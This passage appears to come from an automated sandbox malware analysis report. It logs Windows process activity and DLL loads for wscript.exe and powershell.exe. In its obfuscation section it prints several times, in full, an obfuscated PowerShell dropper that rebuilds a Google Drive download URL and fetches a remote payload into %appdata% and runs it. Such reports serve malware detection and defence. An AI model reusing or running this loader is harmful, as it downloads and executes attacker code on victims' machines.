diskaUdmand.orti&PhylliDe.rwdTaint=Nonp,1 Pinn0InddanAktivj LarmVKoombWCatalCbn.elqag.ip2 Undeq kos kNonreM.anscZ eddyzMiniakArticlAfkogk PoveAArdeaM WiseX,alinZVenge6Epit TPenge1Recla5,entrjVek,lTLevneP nder2 glycRVinhakRaakrbSamfuHPont. ';$Skulapstavs=Antimeningococcic 'Delig>Crash ';$Chantors=Antimeningococcic 'FlymeiMasoneHash.xShei ';$Anniversariness = Antimeningococcic 'no.mae Sta,cBassoh.gpaaoUdv.k Symp% Wi,daS,mfupMisr,pMedendHa niaSystetOverfaMotst% .ryd\BadesCAnt.caBe alb .esaa,repssHuskesMalguoForesuEvolu.FungiTStatsuPoundnOpst Palae&disku&Chain cretaeRadiocSarcohBegrao Arar Anato$Divis ';cairned (Antimeningococcic 'Unim $Afvu,gHenk,lOve eoGallib PreaaExinglHilbe:LlebrT,entroFort s PahacOversaRamifn Ana aOmski=Tor i(AntalcAc.mpmIdeendTalel Nylon/rif,ec Vamb korru$ AgarA sychnWinten Phoniho otvdeltaeRudelrAvilasG lioa,kalmrBastkiAa,eknSol.reFortrsBlocks .agr)Subpr ');cairned (Antimeningococcic ' oshy$MoblegS.kofl Fac,o VocabTrst aKonomlPipin:,elchLtidssyCellanO,iefn For eBrnd dSynodsSaddelA.iata,orbrgrevesePreasnGaranedesi.s Anjo1Sku k6Black=Affal$ KommTSae nrE,astnNedrigAiluregodsen.rypad TerreLdigesUnref.BjergsEk,popJorddlA retiStrantManag(Cuber$B gaeSCarlyk Counu R,tulSlacka TriapFucussLancetLampeaNeutrvSa mesTral.)Septa ');$Trngendes=$Lynnedslagenes16[0];cairned (Antimeningococcic '.ubgo$EpiskgIn.asl ,tamoSuprab Infoa.esoelThe,r:FniscM.echaeOpkrvtAerataKretslH,elclGaussiSub efRegalaRic.icsh oott.geru.irkerBeco e Anar= Afg NForgre DryrwAuric-Anlg OAm hibtangajFs,ebe AmulcHvalptGroun FriedST nefyForfasEngratBlodmeThrummortho. aludNpropoeDomsttPa ad.AgouaWJobb eFletsbSamliC appllChis.i Erkl Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Cabassou.Tun && echo $" Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptnet.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: webio.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cabinet.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: Binary string: re.pdbM source: powershell.exe, 00000002.00000002.1528482696.000001C5ECA79000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000002.00000002.1530394780.000001C5ECC94000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: m.Core.pdbS source: powershell.exe, 00000002.00000002.1528482696.000001C5ECA79000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.1530197727.000001C5ECC80000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb4 source: powershell.exe, 00000002.00000002.1529537443.000001C5ECAC1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbCLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000002.00000002.1530394780.000001C5ECCEB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: b.pdbpdblib.pdb source: powershell.exe, 00000002.00000002.1528482696.000001C5ECA79000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb source: powershell.exe, 00000002.00000002.1530394780.000001C5ECCEB000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

barindex
Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: .Run("POWERSHELL "$Epidydimus = 1;$Painters21='Substrin';$Painters21+='g';Function Antimeningococcic($gejstligt){$Noshe", "0")
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Anti Malware Scan Interface: FromBase64String($Chromeplated) if ($_.FullyQualifiedErrorId -ne "NativeCommandErrorMessage" -and $ErrorView -ne "CategoryView") {
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Epidydimus = 1;$Painters21='Substrin';$Painters21+='g';Function Antimeningococcic($gejstligt){$Nosher=$gejstligt.Length-$Epidydimus;For($Antisnapper=5; $Antisnapper -lt $Nosher; $Antisnapper+=(6)){$taxmen+=$gejstligt.$Painters21.Invoke($Antisnapper, $Epidydimus);}$taxmen;}function cairned($Fremvisningen){. ($Chantors) ($Fremvisningen);}$Veteraness=Antimeningococcic 'ManitMNeph,oNringzregili.hiotlAspirlMet.raKlis,/ Un.e5Svam,. Afvi0Bryde Hjlp(ThundWFemmliKoo.dnServidAlkohoVetuswGlaiesTaare TtsluNDdfdsTOvern erhve1Ambas0 vatp.Therm0Quito;Caul Nonl WLinieiRe,ubnCarah6Feabe4Finia;Malac .apeixL,lla6Re,ro4Ungar;Pre.n NoterGastrvAgmas:bazzi1Tr.me2 Neph1Spe,l.N ter0Sev.r)Velve RepriG CelievasalcChon.kPampaorecta/Okkup2Prs,r0Radom1Entoc0Vov,d0Nonst1Hemag0,aama1 ksam FamilFUdadriRidgir NotceCh.llfCenoso .rorxCoons/ Warn1F.mte2Skede1Udgif.Ties.0Solip ';$Maskinafdelinger=Antimeningococcic 'IndviU,ablesDomineBrou,r Blok-TabifAnuculgSeksee ,ccenHandbtOutbu ';$Trngendes=Antimeningococcic ' AlpehDurditAfbrytTagliphabilsKal,i:Super/Dee,d/Feticd Showr CymoiLokalvReheae lant. Tvrfg tjsvo Flado ResogSe,iclSaf,aeSpiro.Lnpolc GilloNive mUntan/c viluPate cWa,tr?SmelteConquxSp itpSta,doServir O.ert ramp=BoldhdGeon.ogriotw IndknTromllAffreo diskaUdmand.orti&PhylliDe.rwdTaint=Nonp,1 Pinn0InddanAktivj LarmVKoombWCatalCbn.elqag.ip2 Undeq kos kNonreM.anscZ eddyzMiniakArticlAfkogk PoveAArdeaM WiseX,alinZVenge6Epit TPenge1Recla5,entrjVek,lTLevneP nder2 glycRVinhakRaakrbSamfuHPont. ';$Skulapstavs=Antimeningococcic 'Delig>Crash ';$Chantors=Antimeningococcic 'FlymeiMasoneHash.xShei ';$Anniversariness = Antimeningococcic 'no.mae Sta,cBassoh.gpaaoUdv.k Symp% Wi,daS,mfupMisr,pMedendHa niaSystetOverfaMotst% .ryd\BadesCAnt.caBe alb .esaa,repssHuskesMalguoForesuEvolu.FungiTStatsuPoundnOpst Palae&disku&Chain cretaeRadiocSarcohBegrao Arar Anato$Divis ';cairned (Antimeningococcic 'Unim $Afvu,gHenk,lOve eoGallib PreaaExinglHilbe:LlebrT,entroFort s PahacOversaRamifn Ana aOmski=Tor i(AntalcAc.mpmIdeendTalel Nylon/rif,ec Vamb korru$ AgarA sychnWinten Phoniho otvdeltaeRudelrAvilasG lioa,kalmrBastkiAa,eknSol.reFortrsBlocks .agr)Subpr ');cairned (Antimeningococcic ' oshy$MoblegS.kofl Fac,o VocabTrst aKonomlPipin:,elchLtidssyCellanO,iefn For eBrnd dSynodsSaddelA.iata,orbrgrevesePreasnGaranedesi.s Anjo1Sku k6Black=Affal$ KommTSae nrE,astnNedrigAiluregodsen.rypad TerreLdigesUnref.BjergsEk,popJorddlA retiStrantManag(Cuber$B gaeSCarlyk Counu R,tulSlacka TriapFucussLancetLampeaNeutrvSa mesTral.)Septa ');$Trngendes=$Lynnedslagenes16[0];cairned (Antimeningococcic '.ubgo$EpiskgIn.asl ,tamoSuprab Infoa.esoelThe,r:FniscM.echaeOpkrvtAerataKretslH,elclGaussiSub efRegalaRic.icsh oott.geru.irkerBeco e Anar= Afg NForgre DryrwAuric-Anlg OAm hibtangajFs,ebe AmulcHvalptGroun FriedST nefyForfasEngratBlodmeThrummortho. aludNpropoeDomsttPa ad.AgouaWJobb eFletsbSamliC appllChis.i Erkl
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Epidydimus = 1;$Painters21='Substrin';$Painters21+='g';Function Antimeningococcic($gejstligt){$Nosher=$gejstligt.Length-$Epidydimus;For($Antisnapper=5; $Antisnapper -lt $Nosher; $Antisnapper+=(6)){$taxmen+=$gejstligt.$Painters21.Invoke($Antisnapper, $Epidydimus);}$taxmen;}function cairned($Fremvisningen){. ($Chantors) ($Fremvisningen);}$Veteraness=Antimeningococcic 'ManitMNeph,oNringzregili.hiotlAspirlMet.raKlis,/ Un.e5Svam,. Afvi0Bryde Hjlp(ThundWFemmliKoo.dnServidAlkohoVetuswGlaiesTaare TtsluNDdfdsTOvern erhve1Ambas0 vatp.Therm0Quito;Caul Nonl WLinieiRe,ubnCarah6Feabe4Finia;Malac .apeixL,lla6Re,ro4Ungar;Pre.n NoterGastrvAgmas:bazzi1Tr.me2 Neph1Spe,l.N ter0Sev.r)Velve RepriG CelievasalcChon.kPampaorecta/Okkup2Prs,r0Radom1Entoc0Vov,d0Nonst1Hemag0,aama1 ksam FamilFUdadriRidgir NotceCh.llfCenoso .rorxCoons/ Warn1F.mte2Skede1Udgif.Ties.0Solip ';$Maskinafdelinger=Antimeningococcic 'IndviU,ablesDomineBrou,r Blok-TabifAnuculgSeksee ,ccenHandbtOutbu ';$Trngendes=Antimeningococcic ' AlpehDurditAfbrytTagliphabilsKal,i:Super/Dee,d/Feticd Showr CymoiLokalvReheae lant. Tvrfg tjsvo Flado ResogSe,iclSaf,aeSpiro.Lnpolc GilloNive mUntan/c viluPate cWa,tr?SmelteConquxSp itpSta,doServir O.ert ramp=BoldhdGeon.ogriotw IndknTromllAffreo diskaUdmand.orti&PhylliDe.rwdTaint=Nonp,1 Pinn0InddanAktivj LarmVKoombWCatalCbn.elqag.ip2 Undeq kos kNonreM.anscZ eddyzMiniakArticlAfkogk PoveAArdeaM WiseX,alinZVenge6Epit TPenge1Recla5,entrjVek,lTLevneP nder2 glycRVinhakRaakrbSamfuHPont. ';$Skulapstavs=Antimeningococcic 'Delig>Crash ';$Chantors=Antimeningococcic 'FlymeiMasoneHash.xShei ';$Anniversariness = Antimeningococcic 'no.mae Sta,cBassoh.gpaaoUdv.k Symp% Wi,daS,mfupMisr,pMedendHa niaSystetOverfaMotst% .ryd\BadesCAnt.caBe alb .esaa,repssHuskesMalguoForesuEvolu.FungiTStatsuPoundnOpst Palae&disku&Chain cretaeRadiocSarcohBegrao Arar Anato$Divis ';cairned (Antimeningococcic 'Unim $Afvu,gHenk,lOve eoGallib PreaaExinglHilbe:LlebrT,entroFort s PahacOversaRamifn Ana aOmski=Tor i(AntalcAc.mpmIdeendTalel Nylon/rif,ec Vamb korru$ AgarA sychnWinten Phoniho otvdeltaeRudelrAvilasG lioa,kalmrBastkiAa,eknSol.reFortrsBlocks .agr)Subpr ');cairned (Antimeningococcic ' oshy$MoblegS.kofl Fac,o VocabTrst aKonomlPipin:,elchLtidssyCellanO,iefn For eBrnd dSynodsSaddelA.iata,orbrgrevesePreasnGaranedesi.s Anjo1Sku k6Black=Affal$ KommTSae nrE,astnNedrigAiluregodsen.rypad TerreLdigesUnref.BjergsEk,popJorddlA retiStrantManag(Cuber$B gaeSCarlyk Counu R,tulSlacka TriapFucussLancetLampeaNeutrvSa mesTral.)Septa ');$Trngendes=$Lynnedslagenes16[0];cairned (Antimeningococcic '.ubgo$EpiskgIn.asl ,tamoSuprab Infoa.esoelThe,r:FniscM.echaeOpkrvtAerataKretslH,elclGaussiSub efRegalaRic.icsh oott.geru.irkerBeco e Anar= Afg NForgre DryrwAuric-Anlg OAm hibtangajFs,ebe AmulcHvalptGroun FriedST nefyForfasEngratBlodmeThrummortho. aludNpropoeDomsttPa ad.AgouaWJobb eFletsbSamliC appllChis.i Erkl Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFB4B2609CA push E85E455Dh; ret 2_2_00007FFB4B2609F9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFB4B260A18 push E95B64D0h; ret 2_2_00007FFB4B2609C9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFB4B2600BD pushad ; iretd 2_2_00007FFB4B2600C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFB4B260962 push E95B64D0h; ret 2_2_00007FFB4B2609C9
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
